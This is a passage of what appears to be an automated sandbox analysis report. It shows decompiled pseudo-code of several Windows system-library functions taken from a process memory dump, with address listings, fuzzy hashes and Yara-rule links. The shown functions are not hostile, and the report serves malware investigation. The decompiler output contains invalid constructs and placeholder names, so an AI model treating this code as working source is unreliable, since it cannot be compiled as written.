				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x16dd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01610548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0162B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E015FB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x16d7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01607D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01607D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01667016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01629830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E016669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x16d7c04 != 0) {
						_t118 = _v12;
						_t120 = E0166A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x16d7bd8;
						if( *0x16d7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E016295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E016299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01663540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E015EB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0162AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x16d8474 - 3;
										if( *0x16d8474 != 3) {
											 *0x16d79dc =  *0x16d79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E01607D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E01607D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01667016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x16d8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x16d7b00; // 0x0
							asm("ror esi, cl");
							 *0x16db1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E016295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E015F7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                0x016103f1
                                                0x016103f7
                                                0x016103f9
                                                0x016103fb
                                                0x016103fd
                                                0x01610400
                                                0x0161040a
                                                0x01654c7a
                                                0x01610537
                                                0x01610547
                                                0x01610410
                                                0x01610410
                                                0x01610414
                                                0x01610417
                                                0x0161041a
                                                0x01610421
                                                0x01610424
                                                0x0161042b
                                                0x0161043b
                                                0x0161043e
                                                0x0161043f
                                                0x0161043f
                                                0x01610446
                                                0x01610449
                                                0x0161044c
                                                0x0161044f
                                                0x01610459
                                                0x01654c8d
                                                0x0161045f
                                                0x0161045f
                                                0x0161045f
                                                0x01610467
                                                0x01654c97
                                                0x01654c9d
                                                0x01654ca4
                                                0x01654caa
                                                0x01654caf
                                                0x01654cb1
                                                0x01654cc3
                                                0x01654cb3
                                                0x01654cbc
                                                0x01654cbc
                                                0x01654cc8
                                                0x01654ccb
                                                0x01654cd7
                                                0x01654cda
                                                0x01654cdf
                                                0x01654cdf
                                                0x01654ccb
                                                0x01654ca4
                                                0x0161046d
                                                0x0161046f
                                                0x0161046f
                                                0x01610471
                                                0x01610476
                                                0x0161047a
                                                0x0161047b
                                                0x01610483
                                                0x01610489
                                                0x0161048d
                                                0x00000000
                                                0x00000000
                                                0x01654ce9
                                                0x01654cef
                                                0x01654d22
                                                0x01654d22
                                                0x00000000
                                                0x01654d22
                                                0x01654cf1
                                                0x01654cf7
                                                0x00000000
                                                0x00000000
                                                0x01654cf9
                                                0x01654cff
                                                0x00000000
                                                0x00000000
                                                0x01654d05
                                                0x01654d07
                                                0x00000000
                                                0x00000000
                                                0x01654d0d
                                                0x01654d0f
                                                0x01654d14
                                                0x01654d16
                                                0x00000000
                                                0x00000000
                                                0x01654d1c
                                                0x01654d1c
                                                0x01610499
                                                0x01610535
                                                0x01610535
                                                0x00000000
                                                0x01610535
                                                0x016104a6
                                                0x01654d2c
                                                0x01654d37
                                                0x01654d39
                                                0x01654d3b
                                                0x00000000
                                                0x00000000
                                                0x01654d41
                                                0x01654d48
                                                0x01610527
                                                0x0161052b
                                                0x0161052d
                                                0x01610530
                                                0x01610530
                                                0x00000000
                                                0x0161052b
                                                0x01654d4e
                                                0x016104ac
                                                0x016104ac
                                                0x016104af
                                                0x016104b2
                                                0x016104b7
                                                0x016104b9
                                                0x016104bb
                                                0x016104bd
                                                0x016104bf
                                                0x016104c5
                                                0x016104c9
                                                0x01654d53
                                                0x01654d59
                                                0x01654db9
                                                0x01654dba
                                                0x01654dbf
                                                0x01654dc2
                                                0x01654dc4
                                                0x01654dc7
                                                0x01654dce
                                                0x00000000
                                                0x01654dce
                                                0x01654d5b
                                                0x01654d61
                                                0x00000000
                                                0x00000000
                                                0x01654d63
                                                0x01654d69
                                                0x00000000
                                                0x00000000
                                                0x01654d6b
                                                0x01654d6e
                                                0x01654d74
                                                0x01654d76
                                                0x01654d7c
                                                0x01654d7e
                                                0x01654d84
                                                0x01654d89
                                                0x01654d8c
                                                0x01654d8d
                                                0x01654d92
                                                0x01654d95
                                                0x01654d96
                                                0x01654d98
                                                0x01654d9a
                                                0x01654d9f
                                                0x01654da4
                                                0x01654da6
                                                0x01654da8
                                                0x01654daf
                                                0x01654db1
                                                0x01654db1
                                                0x01654daf
                                                0x01654da6
                                                0x01654d84
                                                0x01654d7c
                                                0x00000000
                                                0x01654d74
                                                0x016104d6
                                                0x01654de1
                                                0x016104dc
                                                0x016104dc
                                                0x016104dc
                                                0x016104e4
                                                0x01654deb
                                                0x01654df1
                                                0x01654df8
                                                0x01654dfe
                                                0x01654e03
                                                0x01654e05
                                                0x01654e17
                                                0x01654e07
                                                0x01654e10
                                                0x01654e10
                                                0x01654e1c
                                                0x01654e1f
                                                0x01654e35
                                                0x01654e35
                                                0x01654e1f
                                                0x01654df8
                                                0x016104f1
                                                0x016104fa
                                                0x01654e3f
                                                0x01654e47
                                                0x01654e5b
                                                0x01654e61
                                                0x01654e67
                                                0x01654e69
                                                0x01654e71
                                                0x01654e73
                                                0x01610500
                                                0x01610500
                                                0x01610500
                                                0x016104fa
                                                0x01610508
                                                0x0161051d
                                                0x0161051d
                                                0x0161051f
                                                0x01610524
                                                0x00000000
                                                0x01610524
                                                0x01610515
                                                0x01610517
                                                0x01654e7a
                                                0x01654e7c
                                                0x00000000
                                                0x00000000
                                                0x01654e85
                                                0x00000000
                                                0x01654e85
                                                0x00000000
                                                0x01610517

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94ba0fec3e7fab0642262aa0090ebc0722c4309befa184feed0846cbdaeef0f9
                                                • Instruction ID: d03db2ed36dfae1b9a873ce3481a27044b99bb28dd9bb63785abf1d2993a77e3
                                                • Opcode Fuzzy Hash: 94ba0fec3e7fab0642262aa0090ebc0722c4309befa184feed0846cbdaeef0f9
                                                • Instruction Fuzzy Hash: 2A911632E01615DFEF329A6CCC44BAD7BA5AB45724F0902A5FE10AB3D5EB749C80C785
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015EC600, Relevance: .2, Instructions: 225COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E015EC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x16dd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E015F6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0162B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x16d7b9c; // 0x0
					_t74 = L01604620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01629650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L016077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0162F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E016213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L016077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01629650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                0x015ec608
                                                0x015ec615
                                                0x015ec625
                                                0x015ec62d
                                                0x015ec635
                                                0x015ec640
                                                0x015ec680
                                                0x015ec687
                                                0x015ec688
                                                0x015ec689
                                                0x015ec694
                                                0x015ec694
                                                0x015ec642
                                                0x015ec64a
                                                0x015ec697
                                                0x01657a25
                                                0x01657a2b
                                                0x01657a2e
                                                0x01657a30
                                                0x01657bea
                                                0x01657bea
                                                0x00000000
                                                0x01657bea
                                                0x01657a36
                                                0x01657a43
                                                0x01657a48
                                                0x01657a4c
                                                0x01657a4e
                                                0x00000000
                                                0x00000000
                                                0x01657a58
                                                0x01657a5a
                                                0x01657a5b
                                                0x01657a5c
                                                0x01657a5d
                                                0x01657a63
                                                0x01657a64
                                                0x01657a6a
                                                0x01657a6c
                                                0x01657a6e
                                                0x016579cb
                                                0x016579cb
                                                0x016579ce
                                                0x016579d0
                                                0x01657a98
                                                0x01657a9b
                                                0x01657a9b
                                                0x01657a9e
                                                0x01657aa1
                                                0x01657bbe
                                                0x01657bbe
                                                0x01657bc0
                                                0x01657be0
                                                0x01657be0
                                                0x01657a01
                                                0x01657a01
                                                0x01657a05
                                                0x01657a07
                                                0x01657a15
                                                0x01657a15
                                                0x01657a1a
                                                0x00000000
                                                0x01657a1a
                                                0x01657bc2
                                                0x01657bc6
                                                0x01657bc9
                                                0x01657bcd
                                                0x01657bcf
                                                0x016579e6
                                                0x016579e6
                                                0x016579eb
                                                0x016579eb
                                                0x016579ef
                                                0x016579f1
                                                0x00000000
                                                0x00000000
                                                0x016579f3
                                                0x016579f5
                                                0x016579ff
                                                0x016579ff
                                                0x00000000
                                                0x016579ff
                                                0x016579f7
                                                0x016579fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016579fd
                                                0x01657bd5
                                                0x01657bd8
                                                0x00000000
                                                0x00000000
                                                0x01657ba9
                                                0x01657bac
                                                0x01657bb0
                                                0x01657bb1
                                                0x01657bb1
                                                0x01657bb6
                                                0x00000000
                                                0x01657bb6
                                                0x01657aa7
                                                0x01657aaa
                                                0x00000000
                                                0x00000000
                                                0x01657ab2
                                                0x01657ab3
                                                0x01657ab5
                                                0x01657aec
                                                0x01657aef
                                                0x01657b25
                                                0x01657b28
                                                0x01657b62
                                                0x01657b64
                                                0x01657b8f
                                                0x01657b92
                                                0x01657b96
                                                0x01657b98
                                                0x00000000
                                                0x00000000
                                                0x01657b9e
                                                0x01657b9f
                                                0x01657ba3
                                                0x00000000
                                                0x01657ba3
                                                0x01657b66
                                                0x01657b68
                                                0x01657ae2
                                                0x01657ae2
                                                0x00000000
                                                0x01657ae2
                                                0x01657b6e
                                                0x01657b72
                                                0x01657b75
                                                0x01657b81
                                                0x01657b85
                                                0x01657b87
                                                0x00000000
                                                0x00000000
                                                0x01657b31
                                                0x01657b34
                                                0x01657b3c
                                                0x01657b45
                                                0x01657b46
                                                0x01657b4f
                                                0x01657b51
                                                0x01657b57
                                                0x01657b59
                                                0x01657b59
                                                0x00000000
                                                0x01657b59
                                                0x01657b77
                                                0x00000000
                                                0x01657b77
                                                0x01657b2a
                                                0x00000000
                                                0x01657b2a
                                                0x01657af1
                                                0x01657af3
                                                0x00000000
                                                0x00000000
                                                0x01657afb
                                                0x01657afc
                                                0x01657afe
                                                0x00000000
                                                0x00000000
                                                0x01657b00
                                                0x01657b03
                                                0x00000000
                                                0x00000000
                                                0x01657b05
                                                0x01657b09
                                                0x01657b0d
                                                0x01657b0f
                                                0x00000000
                                                0x00000000
                                                0x01657b18
                                                0x01657b1d
                                                0x00000000
                                                0x01657b1d
                                                0x01657ab7
                                                0x01657ab9
                                                0x00000000
                                                0x00000000
                                                0x01657abf
                                                0x01657ac1
                                                0x00000000
                                                0x00000000
                                                0x01657ac3
                                                0x01657ac6
                                                0x00000000
                                                0x00000000
                                                0x01657ac8
                                                0x01657acc
                                                0x01657ad0
                                                0x01657ad2
                                                0x00000000
                                                0x00000000
                                                0x01657adb
                                                0x00000000
                                                0x01657adb
                                                0x016579d6
                                                0x016579d9
                                                0x016579dc
                                                0x01657a91
                                                0x01657a94
                                                0x00000000
                                                0x01657a94
                                                0x016579e2
                                                0x00000000
                                                0x016579e2
                                                0x01657a74
                                                0x01657a7a
                                                0x00000000
                                                0x00000000
                                                0x01657a8a
                                                0x01657a21
                                                0x01657a21
                                                0x00000000
                                                0x01657a21
                                                0x015ec650
                                                0x015ec651
                                                0x015ec656
                                                0x015ec65c
                                                0x015ec65d
                                                0x015ec663
                                                0x015ec664
                                                0x015ec66a
                                                0x015ec66e
                                                0x016579c5
                                                0x016579c7
                                                0x00000000
                                                0x016579c7
                                                0x015ec67a
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4d3d0cf4179f841430cb09f43cd87ac543a4dad30ddc3959017bd614759774e
                                                • Instruction ID: 127dccbb9ec541d414ae5387559aae947e5557f955271d15753a23b53934dbd9
                                                • Opcode Fuzzy Hash: d4d3d0cf4179f841430cb09f43cd87ac543a4dad30ddc3959017bd614759774e
                                                • Instruction Fuzzy Hash: E181BE766442468BDB66CE58CC80E3BB7E9FB84350F54486EEE459B341E330ED41CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01666DC9, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E01666DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01666B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01607D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01629AE0();
					_t87 = L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0166795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0166795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0166795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0166795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01604620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01666B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01666B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01666B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01666B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01607D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01629AE0();
								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01602400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01602400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01602400( &_v52);
							}
							if(_v28 >= 0) {
								return L01602400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                0x01666dd4
                                                0x01666dde
                                                0x01666de1
                                                0x01666de3
                                                0x01666de6
                                                0x01666de9
                                                0x01666dec
                                                0x01666def
                                                0x01666df2
                                                0x01666df5
                                                0x01666dfe
                                                0x01666e04
                                                0x01666e09
                                                0x01666e0d
                                                0x01666e18
                                                0x01666e1b
                                                0x01666e22
                                                0x01666e2d
                                                0x01666e30
                                                0x01666e36
                                                0x01666e42
                                                0x01666e4d
                                                0x01666e50
                                                0x01666e55
                                                0x01666e5c
                                                0x01666e6e
                                                0x01666e5e
                                                0x01666e67
                                                0x01666e67
                                                0x01666e73
                                                0x01666e74
                                                0x01666e77
                                                0x01666e7c
                                                0x01666e7d
                                                0x01666e8e
                                                0x01666e93
                                                0x01666e9c
                                                0x01666ea8
                                                0x01666eab
                                                0x01666eac
                                                0x01666eb3
                                                0x01666ecd
                                                0x01666edc
                                                0x01666ee2
                                                0x01666ee5
                                                0x01666ef2
                                                0x01666efb
                                                0x01666f01
                                                0x01666f06
                                                0x01666f0b
                                                0x01666f11
                                                0x01666f1a
                                                0x01666f22
                                                0x01666f26
                                                0x01666f26
                                                0x01666f33
                                                0x01666f41
                                                0x01666f44
                                                0x01666f47
                                                0x01666f54
                                                0x01666f65
                                                0x01666f77
                                                0x01666f7c
                                                0x01666f82
                                                0x01666f91
                                                0x01666f99
                                                0x01666fa3
                                                0x01666fae
                                                0x01666fae
                                                0x01666fba
                                                0x01666fbb
                                                0x01666fbc
                                                0x01666fc1
                                                0x01666fc2
                                                0x01666fd3
                                                0x01666fd8
                                                0x01666fd8
                                                0x01666fdf
                                                0x01666fe8
                                                0x01666fee
                                                0x01666fee
                                                0x01666ff5
                                                0x01666ffb
                                                0x01666ffb
                                                0x01667004
                                                0x00000000
                                                0x0166700a
                                                0x01667004
                                                0x01666eb3
                                                0x01666e9c
                                                0x01667015

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction ID: 82d9eb60be175528fb42a70240fc676c2295aed2fd4dbfd84178adef003d17e1
                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                • Instruction Fuzzy Hash: 6E718F71A00619EFDB15DFA8DD84AEEBBBAFF48704F104169E504E7290DB30AA41CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0167B8D0, Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
